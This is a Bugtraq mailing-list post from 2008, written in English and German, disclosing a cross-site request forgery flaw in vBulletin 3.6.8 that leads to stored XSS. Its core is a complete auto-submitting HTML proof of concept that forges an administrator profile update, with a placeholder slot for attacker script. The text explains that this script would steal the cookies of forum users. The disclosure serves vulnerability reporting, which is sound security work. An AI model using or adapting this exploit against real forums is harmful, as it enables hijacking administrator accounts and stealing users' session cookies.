vBulletin 3.6.8 XSRF/XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: vBulletin 3.6.8 XSRF/XSS Vulnerability
From: nbbn@xxxxxxx
Date: Sat, 5 Jan 2008 22:46:14 +0100
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: KMail/1.9.7

###############################################################
Autor: NBBN
Founded: 5,  January 2008
vBulletin Version: 3.6.8 Patch Level x and possible lower
Type: XSRF/XSS 
Risk: Medium
###############################################################

##Explanation(english)##

My english is bad, but I try :-) . vBulletin 3.6.8 is XSRF vulnurable. 
Administrators can use html in there own usertitle. 
An attacker can  update the profile of an administrator by sending a link to a 
site with a code like this:


 <html>
  <head></head>
  <body onLoad=javascript:document.form.submit()>

<form action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile"; 
method="POST" name="form">

<input type="hidden" name="s" value="">
<input type="hidden" name="do" value="updateprofile">
<input type="hidden" name="customtext" value="###########XSS CODE#########"> 
<!-- Attacker's XSS Code -->
<input type="hidden" name="month" value="-1">
<input type="hidden" name="day" value="-1">
<input type="hidden" name="year" value="">
<input type="hidden" name="oldbirthday" value="">
<input type="hidden" name="showbirthday" value="2">
<input type="hidden" name="homepage" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="msn" value="">
<input type="hidden" name="yahoo" value="">
<input type="hidden" name="skype" value="">
</form>
</body>
</html>

If an attacker send a link in a  pm for example,  to the admin with a site 
like the example code, the admin's usertitle updating and have a the code of 
the attacker.The code  executing if the admin have a post done in a thread 
etc. An attacker can use this to steal the cookie of all user's who are 
reading the thread.


##Explanation(Deutsch/German)##:

In vBulletin 3.6.8 gibt es eine XSRF Lücke, die dazu benutzt werden kann, um 
XSS Code auszuführen. Admins können in ihren eigenen Benutzerrang HTML Code 
verwenden. Das kann ein Angreifer ausnutzen um beliebigen html/javascript 
code auszuführen, wenn er den oben stehenden code in eine Seite packt und 
dann dem Admin eine Private Nachricht sendet, mit einem Link zu einer Seite 
mit dem obigen HTML-Code. Somit ist es dem Angreifer möglich, alle Cookies 
von den Benutzern zu klauen, die gerade einen Thread lesen,in welchem ein 
Administrator gepostet hat.

Follow-Ups:
- Re: vBulletin 3.6.8 XSRF/XSS Vulnerability
  - From: nbbn

Prev by Date: Aruba Mobility Controller User Authentication Vulnerability - Aruba Advisory ID: AID-122207
Next by Date: [HSC] Snitz Forums Multiple Vulnerabilities
Previous by thread: Aruba Mobility Controller User Authentication Vulnerability - Aruba Advisory ID: AID-122207
Next by thread: Re: vBulletin 3.6.8 XSRF/XSS Vulnerability
Index(es):
- Date
- Thread